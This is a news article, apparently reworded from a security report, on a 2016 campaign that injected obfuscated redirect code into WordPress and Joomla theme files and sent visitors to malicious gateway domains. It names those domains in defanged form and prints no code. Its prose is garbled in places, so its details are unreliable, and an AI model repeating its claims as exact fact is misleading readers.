Wordpress Redirect Hack Allows Web Traffic To The Malicious URLs
The security experts from Sucuri have exposed today an continuing attack on the sites of WordPress that revised their source code as well as cleverly transmits the users to the malicious websites.
According to an investigation by Sucuri's John Castro that the crooks are using vulnerabilities in older versions of WordPress or plugins of WordPress to gain the right to use to a site and then they are editing the main theme of header.php file by adding up 12 lines of obfuscated code.
Sucuri says that in several cases the hackers handle to acquire the site of admin credentials by other resources as well as just logged in through the site of regular login page that has right to use the WordPress which is built-in theme editor section as well as added the malicious source code by hand.
Whereas various sites of Joomla are also affected.
The security firm also spots out that, further WordPress they have also observed this same malicious code which added to the sites of Joomla in the administrator/includes/help.php file. However, the number of affected the websites of Joomla is much smaller.We discovered a WordPress Redirect Hack via Test0 .com/Default7 .com https://t.co/8ouc4CuG7P by @unmaskparasites pic.twitter.com/HQsrQb5eFk— Sucuri (@sucurisecurity) May 11, 2016
Sucuri says that the operation is still continuing and that, in an earlier version, the attackers were adding up the same obfuscated code in the theme of footer.php file.
After taking out the malicious source code, the security firm says that the functionality which they discovered is trouble-free yet efficient. Attackers are significant that every site to select the incoming users with a 15 percent chance as well as redirect them to a prearranged URL. The malicious source code also puts a cookie in the browser of the user that protects from sending the user again in the forthcoming year.
The malicious sites are gateways to more dangerous than threats.
The domains to that the attacker transmits the users are default7[.]com, test246[.]com, test0[.]com, distinctfestive[.]com, and ableoccassion[.]com.
Sucuri says that these are simple gateways to other anxious domains. Once the user arrives at these gateways, they are transmitted to other as well as many other dangerous sites.
In one of the cases noticed by Sucuri that the users utilizing the Internet Explorer which were transmitted to the websites that pressed the affected malware downloads which made it look like reliable Adobe Flash or Java updates.
Jerome Segura of Malwarebytes also stated that his company saw the same gateway domains which transmit the users to tech support tricks.
And at least 6,400 sites are affected.
Due to several setups of PHP as well as several bad coding in the malicious PHP code on several affected websites and then the code generated an error.